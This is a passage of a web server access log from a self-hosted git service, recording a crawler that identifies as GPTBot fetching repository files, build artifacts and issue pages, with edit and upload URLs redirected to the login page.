2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:18:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 17344] [Gzip 10.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19707] [Gzip 6.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" +[17/Feb/2026:18:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 11112] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" +[17/Feb/2026:18:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10999] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" +[17/Feb/2026:18:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=closed&type=all" +[17/Feb/2026:18:45:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:18:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:18:45:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:18:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:18:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=open&type=all" +[17/Feb/2026:18:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=closed&type=all" +[17/Feb/2026:18:45:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:45:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:45:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:45:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:18:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:18:45:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:18:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:18:45:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:18:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:18:45:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:18:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:18:45:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:45:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:18:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:18:45:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:18:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:18:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 30043] [Gzip 7.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:18:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10836] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:18:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10778] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:18:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11413] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:18:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 12074] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:18:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 12117] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:18:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14376] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:18:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11359] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:18:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11521] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:18:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11501] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:18:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11386] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:18:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11269] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11263] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9850] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11259] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11845] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10530] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10487] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15389] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:45:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15326] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:45:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10537] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11852] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 995] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 987] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9880] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" 